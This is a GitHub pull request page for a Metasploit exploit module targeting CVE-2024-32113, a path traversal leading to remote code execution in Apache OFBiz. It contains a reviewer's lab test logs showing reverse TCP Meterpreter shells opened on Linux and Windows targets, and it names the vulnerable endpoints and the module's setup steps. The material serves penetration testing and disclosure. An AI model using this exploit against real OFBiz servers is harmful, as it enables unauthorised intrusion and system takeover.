-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Apache OFBiz Directory Traversal RCE [CVE-2024-32113] #19249
Apache OFBiz Directory Traversal RCE [CVE-2024-32113] #19249
Conversation
@msjenkins-r7 retest this please |
modules/exploits/multi/http/apache_ofbiz_forgot_password_directory_traversal.rb
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/apache_ofbiz_forgot_password_directory_traversal.md
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/apache_ofbiz_forgot_password_directory_traversal.md
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/apache_ofbiz_forgot_password_directory_traversal.rb
Show resolved
Hide resolved
915e190
to
e14dd93
Compare
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I tested this out on both a Windows and Linux target. I used multiple payloads for Windows to confirm the issue was had originally was no longer present. At this time, everything looks good to me and appears to be working as intended.
I'll go ahead and get this landed.
Linux Testing Output
metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Tested remote code execution successfully
[*] Attempting to exploit...
[*] Sending stage (3045380 bytes) to 192.168.159.128
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.128:42422) at 2024-06-17 10:56:18 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.250.134
OS : Debian 11.4 (Linux 6.8.11-300.fc40.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > pwd
/usr/src/apache-ofbiz
meterpreter >
Windows Testing Output
metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/http/x64/meterpreter/reverse_tcp
metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > check
[+] 192.168.159.10:8443 - The target is vulnerable. Tested remote code execution successfully
metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Tested remote code execution successfully
[*] Attempting to exploit...
[*] Sending stage (201798 bytes) to 192.168.159.10
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.10:59322) at 2024-06-17 11:19:57 -0400
meterpreter > getuid
Server username: MSFLAB\smcintyre
meterpreter > sysinfo
Computer : DC
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : MSFLAB
Logged On Users : 9
Meterpreter : x64/windows
meterpreter > pwd
C:\ofbiz
meterpreter > background
[*] Backgrounding session 4...
metasploit-framework.pr (S:1 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
metasploit-framework.pr (S:1 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Tested remote code execution successfully
[*] Attempting to exploit...
[*] Sending stage (176198 bytes) to 192.168.159.10
[*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.10:59324) at 2024-06-17 11:20:37 -0400
meterpreter > getuid
Server username: MSFLAB\smcintyre
meterpreter >
Release NotesThis adds an exploit for CVE-2024-32113, which is an unauthenticated RCE in Apache OFBiz. |
Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable endpoint
/webtools/control/forgotPassword
allows an attacker to access theProgramExport
endpoint which in turn allows for remote code execution in the context of the user running the application.When exploiting on Windows currently module requires a PowerShell payload to be selected. This payload limitation is outlined in more detail in the documentation.
Verification Steps
use apache_ofbiz_forgot_password_directory_traversal
RHOST
andLHOST
options